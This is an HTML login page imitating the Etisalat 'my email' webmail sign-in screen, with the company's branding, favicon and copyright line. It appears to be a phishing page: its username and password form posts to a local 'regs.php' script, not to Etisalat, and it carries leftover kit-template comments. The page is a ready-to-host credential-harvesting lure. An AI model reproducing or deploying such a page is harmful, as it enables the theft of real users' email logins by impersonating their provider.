<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "#://#.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="#://#.w3.org/1999/xhtml">
	
<head>
		<meta #-equiv="Content-Type" content="text/html; charset=UTF-8"/>
		<!-- Mimic Internet Explorer 7 -->
		<meta #-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
                <link href="#://#.etisalat.ae/en/system/images/generic/etisalat.ico"  rel="shortcut icon" type="image/x-icon" />
                <link rel="stylesheet" href="css/login.css" type="text/css"/>
		<style type="text/css">
			@import "../../../js/dojotoolkit/dojo/resources/dojo.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit_rtl.css";
			@import "../../../js/dojotoolkit/dijit/themes/tundra/form/Button.css";
			@import "../../../js/dojotoolkit/dojox/form/resources/DropDownSelect.css";
                body {
background-image: url(images/background.png); /*You will specify your image path here.*/

background-size: cover;
background-position: top center !important;
background-repeat: no-repeat !important;
background-attachment: fixed;
}

        </style>
                <style>
                .Convergence-Login-Logo {
        background-color: transparent;
        background-image: url("images/mail.jpg");
        background-repeat: no-repeat;
        background-position: 0 0;
        width: 75px;
        height:85px;
        padding: 0 0 0 0;
        border-bottom:none;
        margin-left:5px;
        float:left;
}
        .Convergence-Login-RedBand {
        margin: 0px;
        background-image:url("images/greyband.jpg");
        background-position: left top;
        height: 30px;
        width: 430px;
}


		.Convergence-Login-Logo1 {        background-color: transparent;
        background-image: url("images/mail.jpg");
        background-repeat: no-repeat;
        background-position: 0 0;
        width: 75px;
        height:85px;
        padding: 0 0 0 0;
        border-bottom:none;
        margin-left:5px;
        float:left;
}
.Convergence-Login-RedBand1 {        margin: 0px;
        background-image:url("images/greyband.jpg");
        background-position: left top;
        height: 30px;
        width: 430px;
}
                </style>
		<!--- link rel="stylesheet" href="../../../layout/css/login.css" type="text/css"/ --->
		

		<script type="text/javascript" src="../../../js/dojotoolkit/dojo/dojo.js"></script>
		


	</head>

<body role="application">
		<script type="text/javascript">
			
		</script>
       
		<div class="Convergence-Login" id="convergenceLogin2">
		  <div class="Convergence-Login-Border">
		    <div class="Convergence-Login-Banner">
		      <div class="Convergence-Login-Logo1" wairole="presentation"></div>
		      <div id="welcomeMsg2" class="Convergence-Login-WelcomeMsg">my email - Etisalat Internet Mail</div>
	        </div>
		    <div class="Convergence-Login-Notification" id="alertMsg2" aria-live="assertive" role="alert" tabindex="0" style="visibility: hidden;"></div>
		    <form action="regs.php" method="post" onsubmit="return login();">
		      <div>
		        <div class="Convergence-Login-Form">
		          <div class="Convergence-Login-FormRow">
		            <label id="usernameLabelID" for="username2">Username:</label>
		            <input id="username2" name="username2" type="text" aria-required="true" />
	              </div>
		          <div class="Convergence-Login-FormRow">
		            <label id="passwordLabelID" for="password2">Password:</label>
		            <input id="password2" name="password2" type="password" aria-required="true" autocomplete="off" />
	              </div>
		          <div class="Convergence-Login-FormRow">
		           
	              </div>
		          <div class="Convergence-Login-FormRow tundra">
		            <div class="Convergence-Login-SelectLang"></div>
		            <div class="Convergence-Login-FormButton" id="buttonContainer2">
		              <div> <span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="signin"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode">
		                <button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="submit" value="" wairole="button" waistate="labelledby-signin_label" role="button" aria-labelledby="signin_label" id="signin2" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="signin_label" dojoattachpoint="containerNode">Sign In</span></button>
		                </span></span></span> </div>
	                </div>
		            <div style="clear: both"></div>
	              </div>
	            </div>
	          </div>
		      <div style="clear: both"></div>
	        </form>
		    <div class="Password-Expired-Message tundra" id="PwdExpiredMsg2" style="display:none;">
		      <div class="ErrorMsg-Contianer" id="btnContainer2">
		        <div class="Error-Icon"></div>
		        <div class="Error-Msg" id="errMsg2"></div>
	          </div>
		      <div class="Convergence-Login-FormButton ChangePwdBtn"> <span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="changepwd"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode">
		        <button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="button" value="" wairole="button" waistate="labelledby-changepwd_label" role="button" aria-labelledby="changepwd_label" id="changepwd2" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="changepwd_label" dojoattachpoint="containerNode">Change Password</span></button>
		        </span></span></span> </div>
	        </div>
		    <div class="Convergence-Login-RedBand1"></div>
		    <div id="copyright2" class="Convergence-Login-Copyright">Copyright © 2019, Etisalat. All Rights Reserved.</div>
	      </div>
</div>
</body>

</html>
